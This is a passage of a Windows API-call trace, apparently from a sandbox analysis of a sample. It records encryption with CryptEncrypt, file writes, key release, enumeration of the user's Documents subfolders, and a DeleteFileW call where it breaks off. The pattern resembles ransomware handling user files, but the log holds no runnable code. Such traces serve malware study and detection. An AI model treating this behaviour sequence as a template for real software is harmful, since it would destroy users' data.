hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcf8 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0218.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0218.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.847] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabab8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0218.848] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x8) returned 1 [0218.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.848] CharLowerBuffW (in: lpsz="byte[8]", cchLength=0x7 | out: lpsz="byte[8]") returned 0x7 [0218.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.848] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.848] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.848] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.848] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.848] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.848] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0218.848] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0218.848] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0218.849] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a72698*, pdwDataLen=0x8cef60*=0x0, dwBufLen=0x8 | out: pbData=0x2a72698*, pdwDataLen=0x8cef60*=0x8) returned 1 [0218.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.849] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.852] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.852] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0218.852] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.852] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0218.852] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.852] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.852] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0218.853] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.853] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0218.853] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.853] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.853] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0218.853] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.853] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.853] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.853] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.853] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.853] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0218.853] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.853] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0218.853] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0218.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.853] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.853] WriteFile (in: hFile=0x4e0, lpBuffer=0x2a72708*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72708*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0218.854] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.854] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.854] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0218.854] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.854] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0218.854] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.854] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.855] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.855] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0218.855] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.855] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0218.855] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0218.855] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0218.855] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab938, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0218.855] CryptDestroyKey (hKey=0x9e2078) returned 1 [0218.855] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.855] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.855] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0218.855] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.855] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0218.855] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.855] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.855] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0218.855] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.855] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0218.855] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.855] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.855] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.856] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.856] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0218.856] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.856] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.856] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0218.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.856] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0218.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.856] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0218.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.856] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0218.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0218.856] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.856] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0218.856] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.857] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0218.857] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.857] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0218.857] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.857] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.857] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.857] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0218.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.857] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0218.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0218.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0218.857] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f71a0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0218.857] CryptReleaseContext (hProv=0xa7c660, dwFlags=0x0) returned 1 [0218.857] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.857] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0218.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.857] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0218.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.857] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0218.858] FreeLibrary (hLibModule=0x76390000) returned 1 [0218.858] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.858] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0218.858] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.858] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.858] CloseHandle (hObject=0x4e0) returned 1 [0218.858] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0218.858] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0218.858] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0218.858] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0218.858] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/My Shapes", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\My Shapes", lpFilePart=0x8cedf4*="My Shapes") returned 0x23 [0218.858] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes" (normalized: "c:\\users\\fd1hvy\\documents\\my shapes")) returned 0x14 [0218.859] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\My Shapes\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e21f8 [0218.859] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc1a0f60e, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bc4716, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0218.859] FindNextFileW (in: hFindFile=0x9e21f8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xc1bc4716, ftCreationTime.dwHighDateTime=0x1d47c35, ftLastAccessTime.dwLowDateTime=0xc1bc4716, ftLastAccessTime.dwHighDateTime=0x1d47c35, ftLastWriteTime.dwLowDateTime=0xc1bea8c6, ftLastWriteTime.dwHighDateTime=0x1d47c35, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0218.859] DeleteFileW 